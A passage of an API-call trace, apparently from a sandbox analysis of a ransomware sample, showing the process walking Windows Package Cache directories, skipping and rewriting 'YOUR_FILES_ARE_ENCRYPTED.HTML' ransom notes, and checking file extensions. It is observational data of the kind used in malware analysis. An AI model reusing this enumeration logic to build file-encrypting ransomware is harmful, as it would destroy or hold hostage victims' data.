Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\Windows6.1-KB2999226-x86.msu") returned 125 [0170.123] lstrcmpW (lpString1="Windows6.1-KB2999226-x86.msu", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.123] PathFindExtensionW (pszPath="Windows6.1-KB2999226-x86.msu") returned=".msu" [0170.123] lstrlenW (lpString=".msu") returned 4 [0170.123] PathFindExtensionW (pszPath="Windows6.1-KB2999226-x86.msu") returned=".msu" [0170.123] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc2b01a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc2b01a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2b01a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.123] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0170.123] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.124] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc2b01a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc2b01a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2b01a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.124] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) 
returned 1 [0170.124] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0170.124] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\d4036846864773e3d647f421dfe7f6ca536e307b\\packages\\patch\\x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.124] GetProcessHeap () returned 0x270000 [0170.125] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0170.125] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc2b01a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc2b01a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2b01a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.125] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0170.125] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.125] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc2b01a0, 
ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc2b01a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2b01a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.125] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.125] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0170.125] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\d4036846864773e3d647f421dfe7f6ca536e307b\\packages\\patch\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.125] GetProcessHeap () returned 0x270000 [0170.126] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0170.126] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc2b01a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc2b01a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2d6300, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.126] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All 
Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0170.126] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.126] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc2b01a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc2b01a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2d6300, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.126] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0170.126] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0170.126] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\d4036846864773e3d647f421dfe7f6ca536e307b\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.127] GetProcessHeap () returned 0x270000 [0170.127] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0170.127] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc2d6300, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc2d6300, 
ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2d6300, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.127] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0170.127] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.127] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc2d6300, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc2d6300, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2d6300, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.127] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0170.128] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0170.128] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\d4036846864773e3d647f421dfe7f6ca536e307b\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.128] GetProcessHeap () returned 0x270000 [0170.129] 
HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0170.135] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcd013d60, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcd013d60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcd013d60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.135] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 66 [0170.135] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.135] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc68e560, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc68e560, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508", cAlternateFileName="{0FA68~1.285")) returned 1 [0170.135] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508") returned 87 [0170.135] GetProcessHeap () returned 0x270000 [0170.135] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0170.137] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\All Users\\Package 
Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508" [0170.137] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\*" [0170.137] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc68e560, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc68e560, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0170.137] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc68e560, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc68e560, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.138] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, 
ftLastAccessTime.dwLowDateTime=0xcc668400, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc668400, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 1 [0170.138] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages") returned 96 [0170.138] GetProcessHeap () returned 0x270000 [0170.138] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0170.140] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages" [0170.140] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\*" [0170.140] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc668400, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc668400, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, 
dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0170.140] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc668400, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc668400, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.141] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc668400, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc668400, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0170.141] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86") returned 120 [0170.141] GetProcessHeap () returned 0x270000 [0170.141] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0170.142] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86" 
[0170.142] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\*" [0170.142] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc668400, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc668400, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.143] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc668400, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc668400, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.143] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b027600, ftCreationTime.dwHighDateTime=0x1d5c5bb, ftLastAccessTime.dwLowDateTime=0x1b027600, ftLastAccessTime.dwHighDateTime=0x1d5c5bb, ftLastWriteTime.dwLowDateTime=0xcc6422a0, 
ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x4f83ae, dwReserved0=0x0, dwReserved1=0x60, cFileName="cab1.cab.4A70091801A5FAE53A764E3FFF873AF7E02A1AE8FD8D040ED2D63534408EA343", cAlternateFileName="CAB1CA~1.4A7")) returned 1 [0170.143] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\cab1.cab.4A70091801A5FAE53A764E3FFF873AF7E02A1AE8FD8D040ED2D63534408EA343") returned 194 [0170.143] lstrcmpW (lpString1="cab1.cab.4A70091801A5FAE53A764E3FFF873AF7E02A1AE8FD8D040ED2D63534408EA343", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.143] PathFindExtensionW (pszPath="cab1.cab.4A70091801A5FAE53A764E3FFF873AF7E02A1AE8FD8D040ED2D63534408EA343") returned=".4A70091801A5FAE53A764E3FFF873AF7E02A1AE8FD8D040ED2D63534408EA343" [0170.143] lstrlenW (lpString=".4A70091801A5FAE53A764E3FFF873AF7E02A1AE8FD8D040ED2D63534408EA343") returned 65 [0170.143] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4be2ab00, ftCreationTime.dwHighDateTime=0x1d5c5bb, ftLastAccessTime.dwLowDateTime=0x4be2ab00, ftLastAccessTime.dwHighDateTime=0x1d5c5bb, ftLastWriteTime.dwLowDateTime=0x4be2ab00, ftLastWriteTime.dwHighDateTime=0x1d5c5bb, nFileSizeHigh=0x0, nFileSizeLow=0x2d000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0170.143] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 149 [0170.143] lstrcmpW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.143] 
PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0170.143] lstrlenW (lpString=".msi") returned 4 [0170.143] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0170.143] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc668400, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc668400, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc668400, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.143] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 150 [0170.143] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.144] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc668400, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc668400, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc668400, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.144] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.144] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package 
